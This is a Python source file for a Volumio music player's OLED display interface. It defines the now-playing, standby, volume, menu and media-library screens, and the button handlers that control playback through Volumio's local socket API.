volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 #volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
#imports for REST API (MediaInfoScreen)
b_obj = BytesIO()
crl = pycurl.Curl()
STATE_NONE = -1
STATE_PLAYER = 0
STATE_PLAYLIST_MENU = 1
STATE_QUEUE_MENU = 2
STATE_VOLUME = 3
STATE_SHOW_INFO = 4
STATE_LIBRARY_MENU = 5
STATE_LIBRARY_INFO = 6
UPDATE_INTERVAL = 0.034
PIXEL_SHIFT_TIME = 120 #time between picture position shifts in sec.
interface = spi(device=0, port=0)
oled = ssd1322(interface, rotate=2)
#without rotate display is 0 degrees, with rotate=2 its 180 degrees
oled.WIDTH = 256
oled.HEIGHT = 64
oled.state = 'stop'
oled.stateTimeout = 0
oled.timeOutRunning = False
oled.activeSong = ''
oled.activeArtist = 'VOLuMIO'
oled.playState = 'unknown'
oled.playPosition = 0
oled.modal = False
oled.playlistoptions = []
oled.queue = []
oled.libraryFull = []
oled.libraryNames = []
oled.volumeControlDisabled = True
oled.volume = 100
now = datetime.now() #current date and time
oled.time = now.strftime("%H:%M:%S") #resolves time as HH:MM:SS eg. 14:33:15
oled.date = now.strftime("%d. %m. %Y") #resolves time as dd.mm.YYYY eg. 17.04.2020
oled.IP = os.popen('ip addr show eth0').read().split("inet ")[1].split("/")[0] #resolves IP from Ethernet Adapator
emit_volume = False
emit_track = False
newStatus = 0 #makes newStatus usable outside of onPushState
oled.activeFormat = '' #makes oled.activeFormat globaly usable
oled.activeSamplerate = '' #makes oled.activeSamplerate globaly usable
oled.activeBitdepth = '' #makes oled.activeBitdepth globaly usable
oled.activeArtists = '' #makes oled.activeArtists globaly usable
oled.activeAlbums = '' #makes oled.activeAlbums globaly usable
oled.activeSongs = '' #makes oled.activeSongs globaly usable
oled.activePlaytime = '' #makes oled.activePlaytime globaly usable
oled.Art = 'Interpreten :' #sets the Artists-text for the MediaLibrarayInfo
oled.Alb = 'Alben :' #sets the Albums-text for the MediaLibrarayInfo
oled.Son = 'Songs :' #sets the Songs-text for the MediaLibrarayInfo
oled.Pla = 'Playtime :' #sets the Playtime-text for the MediaLibrarayInfo
oled.randomTag = False #helper to detect if "Random/shuffle" is set
oled.repeatTag = False #helper to detect if "repeat" is set
oled.ShutdownFlag = False #helper to detect if "shutdown" is running. Prevents artifacts from Standby-Screen during shutdown
oled.libraryInfo = '\U0001F4D6'
oled.libraryReturn = '\u2302'
oled.playIcon = '\u25B6'
oled.pauseIcon = '\u2389'
oled.stopIcon = '\u25A0'
oled.nextIcon = '\u23ED'
oled.prevIcon = '\u23EE'
oled.libraryIcon = '\uE003'
oled.playlistIcon = '\uE005'
oled.queueIcon = '\u2630'
oled.arrowUpIcon = '\U0000E75F'
oled.arrowDownIcon = '\U0000E75C'
oled.acceptIcon = '\u2713'
oled.discardIcon = '\u2715'
oled.randomIcon = '\U0001F500'
oled.repeatIcon = '\U0001F501'
oled.ArtistIcon = '\uF0F3'
oled.AlbumIcon = '\uF2BB'
oled.SongIcon = '\U0000F001'
oled.PlaytimeIcon = '\U0000F1DA'
image = Image.new('RGB', (oled.WIDTH, oled.HEIGHT)) #for Pixelshift: (oled.WIDTH + 4, oled.HEIGHT + 4))
oled.clear()
font = load_font('Oxanium-Bold.ttf', 20) #used for Artist
font2 = load_font('Oxanium-Light.ttf', 12) #used for all menus
font3 = load_font('Oxanium-Regular.ttf', 18) #used for Song
font4 = load_font('Oxanium-Medium.ttf', 12) #used for Format/Smplerate/Bitdepth
font5 = load_font('Oxanium-Medium.ttf', 11) #used for MediaLibraryInfo
hugefontaw = load_font('fa-solid-900.ttf', oled.HEIGHT - 4) #used for play/pause/stop icons -> Status change overlay
mediaicon = load_font('fa-solid-900.ttf', 10) #used for icon in Media-library info
iconfont = load_font('entypo.ttf', oled.HEIGHT) #used for play/pause/stop/shuffle/repeat... icons
labelfont = load_font('entypo.ttf', 16) #used for Menu-icons
labelfont2 = load_font('entypo.ttf', 12) #used for Menu-icons
iconfontBottom = load_font('entypo.ttf', 10) #used for icons under the screen / button layout
fontClock = load_font('DSG.ttf', 30) #used for clock
fontDate = load_font('DSEG7Classic-Regular.ttf', 10) #used for Date
fontIP = load_font('DSEG7Classic-Regular.ttf', 10) #used for IP
#above are the "imports" for the fonts.
#After the name of the font comes a number, this defines the Size (height) of the letters.
#Just put .ttf file in the 'Volumio-OledUI/fonts' directory and make an import like above.
def display_update_service():
pixshift = [2, 2]
lastshift = prevTime = time()
while UPDATE_INTERVAL > 0:
dt = time() - prevTime
prevTime = time()
# auto return to home display screen (from volume display / queue list..)
if oled.stateTimeout > 0:
oled.timeOutRunning = True
oled.stateTimeout -= dt
elif oled.stateTimeout <= 0 and oled.timeOutRunning:
oled.timeOutRunning = False
oled.stateTimeout = 0
SetState(STATE_PLAYER)
image.paste("black", [0, 0, image.size[0], image.size[1]])
try:
oled.modal.DrawOn(image)
except AttributeError:
print "render error"
sleep(1)
cimg = image.crop((pixshift[0], pixshift[1], pixshift[0] + oled.WIDTH, pixshift[1] + oled.HEIGHT))
oled.display(cimg)
sleep(UPDATE_INTERVAL)
#Example to SetState:
#oled.modal = NowPlayingScreen(oled.HEIGHT, oled.WIDTH, oled.activeArtist, oled.activeSong, oled.time, oled.IP, font, hugefontaw, fontClock)
#here you have to define which variables you want to use in "class" (following below)
#simply define which "data" (eg. oled.IP...) you want to display followed by the fonts you want to use
#Hint: the "data" is equal to row1, row2... etc. in the classes, first "data" is row1 and so on...
#oled.activeArtist = row1 / oled.activeSong = row2 ....
def SetState(status):
oled.state = status
if oled.state == STATE_PLAYER:
oled.modal = NowPlayingScreen(oled.HEIGHT, oled.WIDTH, oled.activeArtist, oled.activeSong, oled.time, oled.IP, oled.date, oled.activeFormat, oled.activeSamplerate, oled.activeBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo, font, fontClock, fontDate, fontIP, font3, font4, iconfont, iconfontBottom)
oled.modal.SetPlayingIcon(oled.playState, 0)
elif oled.state == STATE_VOLUME:
oled.modal = VolumeScreen(oled.HEIGHT, oled.WIDTH, oled.volume, font, font2)
elif oled.state == STATE_PLAYLIST_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.playlistoptions, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, label='\uE005')
elif oled.state == STATE_QUEUE_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.queue, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, selected=oled.playPosition, showIndex=True, label='\u2630')
elif oled.state == STATE_LIBRARY_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.libraryNames, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, label='\uE003')
elif oled.state == STATE_LIBRARY_INFO:
oled.modal = MediaLibrarayInfo(oled.HEIGHT, oled.WIDTH, oled.activeArtists, oled.activeAlbums, oled.activeSongs, oled.activePlaytime, oled.Art, oled.Alb, oled.Son, oled.Pla, oled.libraryInfo, oled.libraryReturn, oled.ArtistIcon, oled.AlbumIcon, oled.SongIcon, oled.PlaytimeIcon, hugefontaw, font5, iconfontBottom, labelfont, labelfont2, mediaicon)
def LoadPlaylist(playlistname):
print ("loading playlist: " + playlistname.encode('ascii', 'ignore'))
oled.playPosition = 0
volumioIO.emit('playPlaylist', {'name':playlistname})
SetState(STATE_PLAYER)
#In 'onPushState' the whole set of media-information is linked to the variables (eg. artist, song...)
#On every change in the Playback (pause, other track, etc.) Volumio pushes a set of informations on port 3000.
#Volumio-OledUI is always listening on this port. If there's new 'data', the "def onPushState(data):" runs again.
def onPushState(data):
# print(data) #for log, if enabled you see the values for 'data'
OPDsave = data
global OPDsave
global newStatus #global definition for newStatus, used at the end-loop to update standby
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: #volumio can push NoneType
newArtist = ''
if 'stream' in data:
newFormat = data['stream']
else:
newFormat = ''
if newFormat is None:
newFormat = ''
if newFormat == True:
newFormat = 'WebRadio'
#If a stream (like webradio) is playing, the data set for 'stream'/newFormat is a boolian (True)
#drawOn can't handle that and gives an error.
#therefore we use "if newFormat == True:" and define a placeholder Word, you can change it.
if 'samplerate' in data:
newSamplerate = data['samplerate']
else:
newSamplerate = ' '
if newSamplerate is None:
newSamplerate = ' '
if 'bitdepth' in data:
newBitdepth = data['bitdepth']
else:
newBitdepth = ' '
if newBitdepth is None:
newBitdepth = ' '
if 'position' in data: # current position in queue
oled.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if oled.state != STATE_VOLUME: #get volume on startup and remote control
try: #it is either number or unicode text
oled.volume = int(data['volume'])
except (KeyError, ValueError):
pass
if 'disableVolumeControl' in data:
oled.volumeControlDisabled = data['disableVolumeControl']
oled.activeFormat = newFormat
oled.activeSamplerate = newSamplerate
oled.activeBitdepth = newBitdepth
print(newSong.encode('ascii', 'ignore'))
if (newSong != oled.activeSong) or (newArtist != oled.activeArtist): # new song and artist
oled.activeSong = newSong
oled.activeArtist = newArtist
if oled.state == STATE_PLAYER and newStatus != 'stop': #this is the "NowPlayingScreen"
oled.modal.UpdatePlayingInfo(newArtist, newSong, newFormat, newSamplerate, newBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon) #here is defined which "data" should be displayed in the class
if oled.state == STATE_PLAYER and newStatus == 'stop': #this is the "Standby-Screen"
oled.modal.UpdateStandbyInfo(oled.time, oled.IP, oled.date, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo) #here is defined which "data" should be displayed in the class
if newStatus != oled.playState:
oled.playState = newStatus
if oled.state == STATE_PLAYER:
if oled.playState == 'play':
iconTime = 35
else:
iconTime = 80
oled.modal.SetPlayingIcon(oled.playState, iconTime)
def onPushCollectionStats(data):
data = json.loads(data) #data import from REST-API (is set when ButtonD short-pressed in Standby)
if "artists" in data: #used for Media-Library-Infoscreen
newArtists = data["artists"]
else:
newArtists = ''
if newArtists is None:
newArtists = ''
if 'albums' in data: #used for Media-Library-Infoscreen
newAlbums = data["albums"]
else:
newAlbums = ''
if newAlbums is None:
newAlbums = ''
if 'songs' in data: #used for Media-Library-Infoscreen
newSongs = data["songs"]
else:
newSongs = ''
if newSongs is None:
newSongs = ''
if 'playtime' in data: #used for Media-Library-Infoscreen
newPlaytime = data["playtime"]
else:
newPlaytime = ''
if newPlaytime is None:
newPlaytime = ''
oled.activeArtists = str(newArtists)
oled.activeAlbums = str(newAlbums)
oled.activeSongs = str(newSongs)
oled.activePlaytime = str(newPlaytime)
if oled.state == STATE_LIBRARY_INFO and oled.playState == 'info': #this is the "Media-Library-Info-Screen"
oled.modal.UpdateLibraryInfo(oled.activeArtists, oled.activeAlbums, oled.activeSongs, oled.activePlaytime, oled.Art, oled.Alb, oled.Son, oled.Pla, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryReturn)
def onPushQueue(data):
oled.queue = [track['name'] if 'name' in track else 'no track' for track in data]
print('Queue length is ' + str(len(oled.queue)))
def onPushBrowseSources(data):
# print('Browse sources:')
# for item in data:
# print(item['uri'])
pass
def onLibraryBrowse(data):
oled.libraryFull = data
itemList = oled.libraryFull['navigation']['lists'][0]['items']
oled.libraryNames = [item['title'] if 'title' in item else 'empty' for item in itemList]
SetState(STATE_LIBRARY_MENU)
def EnterLibraryItem(itemNo):
selectedItem = oled.libraryFull['navigation']['lists'][0]['items'][itemNo]
print("Entering library item: " + oled.libraryNames[itemNo].encode('ascii', 'ignore'))
if selectedItem['type'][-8:] == 'category' or selectedItem['type'] == 'folder':
volumioIO.emit('browseLibrary',{'uri':selectedItem['uri']})
else:
print("Sending new Queue")
volumioIO.emit('clearQueue') #clear queue and add whole list of items
oled.queue = []
volumioIO.emit('addToQueue', oled.libraryFull['navigation']['lists'][0]['items'])
oled.stateTimeout = 5.0 #maximum time to load new queue
while len(oled.queue) == 0 and oled.stateTimeout > 0.1:
sleep(0.1)
oled.stateTimeout = 0.2
print("Play position = " + str(itemNo))
volumioIO.emit('play', {'value':itemNo})
def LibraryReturn(): #go to parent category
if not 'prev' in oled.libraryFull['navigation']:
SetState(STATE_PLAYER)
else:
parentCategory = oled.libraryFull['navigation']['prev']['uri']
print ("Navigating to parent category in library: " + parentCategory.encode('ascii', 'ignore'))
if parentCategory != '' and parentCategory != '/':
volumioIO.emit('browseLibrary',{'uri':parentCategory})
else:
SetState(STATE_PLAYER)
def onPushListPlaylist(data):
global oled
if len(data) > 0:
oled.playlistoptions = data
#if you wan't to add more textposition: double check if using STATIC or SCROLL text.
#this needs to be declared two times, first in "self.playingText" AND under: "def UpdatePlayingInfo" or "def UpdateStandbyInfo"
class NowPlayingScreen():
def __init__(self, height, width, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14, row15, row16, row17, font, fontClock, fontDate, fontIP, font3, font4, iconfont, iconfontBottom): #this line references to oled.modal = NowPlayingScreen
self.height = height
self.width = width
self.font = font
self.font3 = font3
self.font4 = font4
self.iconfont = iconfont
self.icontfontBottom = iconfontBottom
self.fontClock = fontClock
self.fontDate = fontDate
self.fontIP = fontIP
self.playingText1 = ScrollText(self.height, self.width, row1, font) #Artist /center=True
self.playingText2 = ScrollText(self.height, self.width, row2, font3) #Title
self.playingText3 = StaticText(self.height, self.width, row6, font4) #format / flac,MP3...
self.playingText4 = StaticText(self.height, self.width, row7, font4) #samplerate / 44100
self.playingText5 = StaticText(self.height, self.width, row8, font4) #bitdepth /16 Bit
self.playingText6 = StaticText(self.height, self.width, row9, iconfontBottom) #PlayIcon
self.playingText7 = StaticText(self.height, self.width, row10, iconfontBottom) #PauseIcon
self.playingText8 = StaticText(self.height, self.width, row11, iconfontBottom) #StopIcon
self.playingText9 = StaticText(self.height, self.width, row12, iconfontBottom) #PreviousIcon
self.playingText10 = StaticText(self.height, self.width, row13, iconfontBottom) #NextIcon
self.standbyText1 = StaticText(self.height, self.width, row3, fontClock) #Clock /center=True
self.standbyText2 = StaticText(self.height, self.width, row4, fontIP) #IP
self.standbyText3 = StaticText(self.height, self.width, row5, fontDate) #Date
self.standbyText4 = StaticText(self.height, self.width, row14, iconfontBottom) #LibraryIcon
self.standbyText5 = StaticText(self.height, self.width, row15, iconfontBottom) #PlaylistIcon
self.standbyText6 = StaticText(self.height, self.width, row16, iconfontBottom) #QueueIcon
self.standbyText7 = StaticText(self.height, self.width, row17, iconfontBottom) #LibraryInfoIcon
self.icon = {'play':'\u25B6', 'pause':'\u2389', 'stop':'\u25A0'} #entypo icons
self.playingIcon = self.icon['play']
self.iconcountdown = 0
self.text1Pos = (42, 2) #Artist /
self.text2Pos = (42, 22) #Title
self.text3Pos = (73, 4) #clock (clock text is 161 pixels long) (222px viewable - text = 73 : 2 = 31 + 42offset = 73)
self.text4Pos = (42, 41) #IP
self.text5Pos = (184, 41) #Date
self.text6Pos = (42, 41) #format
self.text7Pos = (156, 41) #samplerate
self.text8Pos = (217, 41) #bitdepth
self.text9Pos = (52, 54) #PlayIcon
self.text10Pos = (62, 54) #PauseIcon
self.text11Pos = (109, 54) #StopIcon
self.text12Pos = (194, 54) #PreviousIcon
self.text13Pos = (241, 54) #NextIcon
self.text14Pos = (57, 54) #LibraryIcon
self.text15Pos = (109, 54) #PlaylistIcon
self.text16Pos = (194, 54) #QueueIcon
self.text17Pos = (241, 54) #LibraryInfoIcon
self.alfaimage = Image.new('RGBA', image.size, (0, 0, 0, 0))
# "def __init__(self,...." is the "initialization" of the "NowPlayingScreen".
#Here you need to define the variables, which "data-string" is which textposition, where each textposition is displayed in the display...
def UpdatePlayingInfo(self, row1, row2, row6, row7, row8, row9, row10, row11, row12, row13):
self.playingText1 = ScrollText(self.height, self.width, row1, font) #Artist/ center=True)
self.playingText2 = ScrollText(self.height, self.width, row2, font3) #Title
self.playingText3 = StaticText(self.height, self.width, row6, font4) #format
self.playingText4 = StaticText(self.height, self.width, row7, font4) #samplerate
self.playingText5 = StaticText(self.height, self.width, row8, font4) #bitdepth
self.playingText6 = StaticText(self.height, self.width, row9, iconfontBottom) #PlayIcon
self.playingText7 = StaticText(self.height, self.width, row10, iconfontBottom) #PauseIcon
self.playingText8 = StaticText(self.height, self.width, row11, iconfontBottom) #StopIcon
self.playingText9 = StaticText(self.height, self.width, row12, iconfontBottom) #PreviousIcon
self.playingText10 = StaticText(self.height, self.width, row13, iconfontBottom) #NextIcon
def UpdateStandbyInfo(self, row3, row4, row5, row14, row15, row16, row17):
self.standbyText1 = StaticText(self.height, self.width, row3, fontClock) #Clock center=True)
self.standbyText2 = StaticText(self.height, self.width, row4, fontIP) #IP
self.standbyText3 = StaticText(self.height, self.width, row5, fontDate) #Date
self.standbyText4 = StaticText(self.height, self.width, row14, iconfontBottom) #LibraryIcon
self.standbyText5 = StaticText(self.height, self.width, row15, iconfontBottom) #PlaylistIcon
self.standbyText6 = StaticText(self.height, self.width, row16, iconfontBottom) #QueueIcon
self.standbyText7 = StaticText(self.height, self.width, row17, iconfontBottom) #LibraryInfoIcon
#"def UpdateStandbyInfo" and "def UpdatePlayingInfo" collects the informations.
# "def DrawON(..." takes informations from above and creates a "picture" which then is transfered to your display
def DrawOn(self, image):
if self.playingIcon != self.icon['stop']:
self.playingText1.DrawOn(image, self.text1Pos) #Artist
self.playingText2.DrawOn(image, self.text2Pos) #Title
self.playingText3.DrawOn(image, self.text6Pos) #Format
self.playingText4.DrawOn(image, self.text7Pos) #Samplerate
self.playingText5.DrawOn(image, self.text8Pos) #Bitdepth
self.playingText6.DrawOn(image, self.text9Pos) #play
self.playingText7.DrawOn(image, self.text10Pos) #pause
self.playingText8.DrawOn(image, self.text11Pos) #stop
self.playingText9.DrawOn(image, self.text12Pos) #previous
self.playingText10.DrawOn(image, self.text13Pos) #next
if self.playingIcon == self.icon['stop']:
self.standbyText1.DrawOn(image, self.text3Pos) #Clock
self.standbyText2.DrawOn(image, self.text4Pos) #IP
self.standbyText3.DrawOn(image, self.text5Pos) #Date
self.standbyText4.DrawOn(image, self.text14Pos) #library
self.standbyText5.DrawOn(image, self.text15Pos) #playlist
self.standbyText6.DrawOn(image, self.text16Pos) #queue
self.standbyText7.DrawOn(image, self.text17Pos) #libraryInfo
if self.iconcountdown > 0:
compositeimage = Image.composite(self.alfaimage, image.convert('RGBA'), self.alfaimage)
image.paste(compositeimage.convert('RGB'), (0, 0))
self.iconcountdown -= 1
def SetPlayingIcon(self, state, time=0):
if state in self.icon:
self.playingIcon = self.icon[state]
self.alfaimage.paste((0, 0, 0, 200), [0, 0, image.size[0], image.size[1]]) #(0, 0, 0, 200) means Background (nowplayingscreen with artist, song etc.) is darkend. Change 200 to 0 -> Background is completely visible. 255 -> Bachground is not visible. scale = 0-255
drawalfa = ImageDraw.Draw(self.alfaimage)
iconwidth, iconheight = drawalfa.textsize(self.playingIcon, font=self.iconfont) #entypo
left = (self.width - iconwidth + 42) / 2 #here is defined where the play/pause/stop icons are displayed.
drawalfa.text((left, 4), self.playingIcon, font=self.iconfont, fill=(255, 255, 255, 200)) #(255, 255, 255, 200) means Icon is nearly white. Change 200 to 0 -> icon is not visible. scale = 0-255
self.iconcountdown = time
class MediaLibrarayInfo():
def __init__(self, height, width, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14, fontaw, font5, iconfontBottom, labelfont, lablefont2, mediaicon): #this line references to oled.modal = NowPlayingScreen
self.height = height
self.width = width
self.font4 = font4
self.fontaw = fontaw
self.iconfontBottom = iconfontBottom
self.labelfont = labelfont
self.labelfont2 = labelfont2
self.mediaicon = mediaicon
self.LibraryInfoText1 = StaticText(self.height, self.width, row5, font4) #Text for Artists
self.LibraryInfoText2 = StaticText(self.height, self.width, row1, font4) #Number of Artists
self.LibraryInfoText3 = StaticText(self.height, self.width, row6, font4) #Text for Albums
self.LibraryInfoText4 = StaticText(self.height, self.width, row2, font4) #Number of Albums
self.LibraryInfoText5 = StaticText(self.height, self.width, row7, font4) #Text for Songs
self.LibraryInfoText6 = StaticText(self.height, self.width, row3, font4) #Number of Songs
self.LibraryInfoText7 = StaticText(self.height, self.width, row8, font4) #Text for duration
self.LibraryInfoText8 = StaticText(self.height, self.width, row4, font4) #Summary of duration
self.LibraryInfoText9 = StaticText(self.height, self.width, row9, labelfont2) #Menu-label Icon
self.LibraryInfoText10 = StaticText(self.height, self.width, row10, iconfontBottom) #LibraryInfo Return
self.LibraryInfoText11 = StaticText(self.height, self.width, row11, mediaicon) #icon for Artists
self.LibraryInfoText12 = StaticText(self.height, self.width, row12, mediaicon) #icon for Albums
self.LibraryInfoText13 = StaticText(self.height, self.width, row13, mediaicon) #icon for Songs
self.LibraryInfoText14 = StaticText(self.height, self.width, row14, mediaicon) #icon for duration
self.icon = {'info':'\F0CA'}
self.mediaIcon = self.icon['info']
self.iconcountdown = 0
self.text1Pos = (140, 2) #Number of Artists
self.text2Pos = (140, 15) #Number of Albums4
self.text3Pos = (140, 28) #Number of Songs
self.text4Pos = (140, 41) #Summary of duration
self.text5Pos = (56, 2) #Text for Artists
self.text6Pos = (56, 15) #Text for Albums
self.text7Pos = (56, 28) #Text for Songs
self.text8Pos = (56, 41) #Text for duration
self.text9Pos = (148, 52) #Menu-Label Icon
self.text10Pos = (241, 54) #LibraryInfoIcon
self.text11Pos = (42, 2) #icon for Artists
self.text12Pos = (42, 15) #icon for Albums
self.text13Pos = (42, 28) #icon for Songs
self.text14Pos = (42, 41) #icon for duration
self.alfaimage = Image.new('RGBA', image.size, (0, 0, 0, 0))
def UpdateLibraryInfo(self, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14):
self.LibraryInfoText1 = StaticText(self.height, self.width, row5, font4) #Text for Artists
self.LibraryInfoText2 = StaticText(self.height, self.width, row1, font4) #Number of Artists
self.LibraryInfoText3 = StaticText(self.height, self.width, row6, font4) #Text for Albums
self.LibraryInfoText4 = StaticText(self.height, self.width, row2, font4) #Number of Albums
self.LibraryInfoText5 = StaticText(self.height, self.width, row7, font4) #Text for Songs
self.LibraryInfoText6 = StaticText(self.height, self.width, row3, font4) #Number of Songs
self.LibraryInfoText7 = StaticText(self.height, self.width, row8, font4) #Text for duration
self.LibraryInfoText8 = StaticText(self.height, self.width, row4, font4) #Summary of duration
self.LibraryInfoText9 = StaticText(self.height, self.width, row9, labelfont2) #Menu-label Icon
self.LibraryInfoText10 = StaticText(self.height, self.width, row10, iconfontBottom) #LibraryInfo Return
self.LibraryInfoText11 = StaticText(self.height, self.width, row11, mediaicon) #icon for Artists
self.LibraryInfoText12 = StaticText(self.height, self.width, row12, mediaicon) #icon for Albums
self.LibraryInfoText13 = StaticText(self.height, self.width, row13, mediaicon) #icon for Songs
self.LibraryInfoText14 = StaticText(self.height, self.width, row14, mediaicon) #icon for duration
def DrawOn(self, image):
if self.mediaIcon == self.icon['info']:
self.LibraryInfoText1.DrawOn(image, self.text5Pos) #Text for Artists
self.LibraryInfoText2.DrawOn(image, self.text1Pos) #Number of Artists
self.LibraryInfoText3.DrawOn(image, self.text6Pos) #Text for Albums
self.LibraryInfoText4.DrawOn(image, self.text2Pos) #Number of Albums
self.LibraryInfoText5.DrawOn(image, self.text7Pos) #Text for Songs
self.LibraryInfoText6.DrawOn(image, self.text3Pos) #Number of Songs
self.LibraryInfoText7.DrawOn(image, self.text8Pos) #Text for duration
self.LibraryInfoText8.DrawOn(image, self.text4Pos) #Number of duration
self.LibraryInfoText9.DrawOn(image, self.text9Pos) #menulabelIcon
self.LibraryInfoText10.DrawOn(image, self.text10Pos) #LibraryInfo Return
self.LibraryInfoText11.DrawOn(image, self.text11Pos) #icon for Artists
self.LibraryInfoText12.DrawOn(image, self.text12Pos) #icon for Albums
self.LibraryInfoText13.DrawOn(image, self.text13Pos) #icon for Songs
self.LibraryInfoText14.DrawOn(image, self.text14Pos) #icon for duration
if self.iconcountdown > 0:
compositeimage = Image.composite(self.alfaimage, image.convert('RGBA'), self.alfaimage)
image.paste(compositeimage.convert('RGB'), (0, 0))
self.iconcountdown -= 1
def SetPlayingIcon(self, state, time=0):
if state in self.icon:
self.mediaIcon = self.icon[state]
self.alfaimage.paste((0, 0, 0, 0), [0, 0, image.size[0], image.size[1]])
drawalfa = ImageDraw.Draw(self.alfaimage)
iconwidth, iconheight = drawalfa.textsize(self.playingIcon, font=self.fontaw)
left = (self.width - iconwidth + 42) / 2 #here is defined where the play/pause/stop icons are displayed.
drawalfa.text((left, 4), self.playingIcon, font=self.fontaw, fill=(255, 255, 255, 96))
self.iconcountdown = time
class VolumeScreen():
def __init__(self, height, width, volume, font, font2):
self.height = height
self.width = width
self.font = font
self.font2 = font2
self.volumeLabel = None
self.labelPos = (40, 5)
self.volumeNumber = None
self.numberPos = (40, 25)
self.barHeight = 22
self.barWidth = 140
self.volumeBar = Bar(self.height, self.width, self.barHeight, self.barWidth)
self.barPos = (105, 27)
self.volume = 0
self.DisplayVolume(volume)
def DisplayVolume(self, volume):
self.volume = volume
self.volumeNumber = StaticText(self.height, self.width, str(volume) + '%', self.font)
self.volumeLabel = StaticText(self.height, self.width, 'Volume', self.font2)
self.volumeBar.SetFilledPercentage(volume)
def DrawOn(self, image):
self.volumeLabel.DrawOn(image, self.labelPos)
self.volumeNumber.DrawOn(image, self.numberPos)
self.volumeBar.DrawOn(image, self.barPos)
class MenuScreen():
def __init__(self, height, width, font2, iconfontBottom, labelfont, menuList, row1, row2, row3, row4, selected=0, rows=3, label='', showIndex=False):
self.height = height
self.width = width
self.font2 = font2
self.iconfontBottom = iconfontBottom
self.labelfont = labelfont
self.selectedOption = selected
self.row1 = row1
self.row2 = row2
self.row3 = row3
self.row4 = row4
self.menuLabel = StaticText(self.height, self.width, label, labelfont)
if label == '':
self.hasLabel = 0
else:
self.hasLabel = 1
self.labelPos = (148, 52) #here is the position of the menu label
self.menuYPos = 2 + 12 * self.hasLabel
self.menurows = rows
self.menuText = [None for i in range(self.menurows)]
self.Icon1 = StaticText(self.height, self.width, row1, iconfontBottom) #UpIcon
self.Icon2 = StaticText(self.height, self.width, row2, iconfontBottom) #DownlistIcon
self.Icon3 = StaticText(self.height, self.width, row4, iconfontBottom) #DiscardIcon
self.Icon4 = StaticText(self.height, self.width, row3, iconfontBottom) #AcceptInfoIcon
self.menuList = menuList
self.totaloptions = len(menuList)
self.onscreenoptions = min(self.menurows, self.totaloptions)
self.firstrowindex = 0
self.showIndex = showIndex
self.text1Pos = (57, 54) #UpIcon
self.text2Pos = (109, 54) #DownIcon
self.text3Pos = (194, 54) #DiscardIcon
self.text4Pos = (241, 54) #AcceptIcon
self.MenuUpdate()
def MenuUpdate(self):
self.firstrowindex = min(self.firstrowindex, self.selectedOption)
self.firstrowindex = max(self.firstrowindex, self.selectedOption - (self.menurows-1))
for row in range(self.onscreenoptions):
if (self.firstrowindex + row) == self.selectedOption:
color = "black"
bgcolor = "white"
else:
color = "white"
bgcolor = "black"
optionText = self.menuList[row+self.firstrowindex]
if self.showIndex:
width = 1 + len(str(self.totaloptions)) # more digits needs more space
optionText = '{0:{width}d} {1}'.format(row + self.firstrowindex + 1, optionText, width=width)
self.menuText[row] = StaticText(self.height, self.width, optionText, self.font2, fill=color, bgcolor=bgcolor)
if self.totaloptions == 0:
self.menuText[0] = StaticText(self.height, self.width, 'no items..', self.font2, fill="white", bgcolor="black")
def NextOption(self):
self.selectedOption = min(self.selectedOption + 1, self.totaloptions - 1)
self.MenuUpdate()
def PrevOption(self):
self.selectedOption = max(self.selectedOption - 1, 0)
self.MenuUpdate()
def SelectedOption(self):
return self.selectedOption
def DrawOn(self, image):
if self.hasLabel:
self.menuLabel.DrawOn(image, self.labelPos)
self.Icon1.DrawOn(image, self.text1Pos) #UP
self.Icon2.DrawOn(image, self.text2Pos) #Down
self.Icon3.DrawOn(image, self.text3Pos) #Discard
self.Icon4.DrawOn(image, self.text4Pos) #Accept
for row in range(self.onscreenoptions):
self.menuText[row].DrawOn(image, (42, 4 + row*16)) #Here is the position of the list entrys from left set (42)
if self.totaloptions == 0:
self.menuText[0].DrawOn(image, (42, 4)) #Here is the position of the list entrys from left set (42)
def ButtonA_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 3 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonA short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
if oled.playState == 'play':
volumioIO.emit('pause')
else:
volumioIO.emit('play')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_QUEUE_MENU or oled.state == STATE_LIBRARY_MENU:
oled.modal.PrevOption()
#longpress functions below
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
print('ButtonA long press event')
oled.ShutdownFlag = True
sleep(0.1)
show_logo("shutdown.ppm", oled)
sleep(5)
oled.cleanup() # put display into low power mode
volumioIO.emit('shutdown')
sleep(60)
def ButtonB_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 2 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonB short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('stop')
